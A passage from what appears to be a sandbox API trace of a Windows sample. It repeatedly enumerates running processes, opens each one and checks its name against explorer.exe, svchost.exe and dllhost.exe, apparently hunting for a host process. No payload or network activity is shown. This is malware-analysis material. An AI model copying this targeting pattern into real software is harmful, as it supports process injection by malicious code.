(in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0236.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0236.457] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0236.458] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.458] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.458] CloseHandle (hObject=0xec) returned 1 [0236.458] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0236.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0236.458] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.458] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.458] CloseHandle (hObject=0xec) returned 1 [0236.458] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0236.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0236.459] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0236.459] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.459] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.459] CloseHandle (hObject=0xec) returned 1 [0236.459] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0236.460] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0236.460] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.460] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.460] CloseHandle (hObject=0xec) returned 1 [0236.460] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.461] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0236.461] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.461] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.461] CloseHandle (hObject=0xec) returned 1 [0236.461] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0236.462] CloseHandle (hObject=0xe8) returned 1 [0236.462] Sleep (dwMilliseconds=0x3e8) [0237.514] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0237.516] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0237.517] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0237.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0237.517] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0237.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0237.518] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0237.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0237.518] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0237.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0237.519] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0237.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0237.519] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0237.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0237.520] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0237.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0237.520] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0237.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0237.521] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0237.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0237.521] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0237.522] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0237.522] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0237.523] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0237.523] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0237.524] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0237.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0237.524] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0237.525] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0237.525] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0237.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0237.526] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.526] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.526] CloseHandle (hObject=0xec) returned 1 [0237.526] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0237.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0237.526] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0237.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0237.527] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.527] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.527] CloseHandle (hObject=0xec) returned 1 [0237.527] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0237.528] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0237.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0237.528] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0237.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0237.529] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.529] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.529] CloseHandle (hObject=0xec) returned 1 [0237.529] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0237.529] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0237.529] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0237.529] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0237.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0237.529] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.529] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.529] CloseHandle (hObject=0xec) returned 1 [0237.530] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0237.530] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0237.530] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0237.530] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0237.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0237.530] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.530] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.530] CloseHandle (hObject=0xec) returned 1 [0237.530] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0237.530] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0237.530] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0237.530] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0237.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0237.531] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.531] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.531] CloseHandle (hObject=0xec) returned 1 [0237.531] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0237.531] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0237.531] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0237.531] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0237.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0237.531] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.532] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.532] CloseHandle (hObject=0xec) returned 1 [0237.532] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0237.532] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0237.532] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0237.532] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0237.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0237.532] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.532] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.532] CloseHandle (hObject=0xec) returned 1 [0237.532] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0237.532] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0237.532] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0237.532] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0237.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0237.533] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.533] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.533] CloseHandle (hObject=0xec) returned 1 [0237.533] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0237.533] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0237.533] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0237.533] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0237.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0237.534] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.534] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.534] CloseHandle (hObject=0xec) returned 1 [0237.534] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0237.534] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0237.534] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0237.534] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0237.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0237.534] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.534] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.534] CloseHandle (hObject=0xec) returned 1 [0237.534] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0237.534] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0237.534] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0237.534] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0237.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0237.535] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.535] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.535] CloseHandle (hObject=0xec) returned 1 [0237.535] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0237.535] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0237.535] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0237.535] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0237.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0237.536] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.536] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.536] CloseHandle (hObject=0xec) returned 1 [0237.536] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0237.536] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0237.536] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0237.536] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0237.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0237.536] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.536] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.536] CloseHandle (hObject=0xec) returned 1 [0237.536] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0237.537] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0237.537] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0237.537] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0237.537] 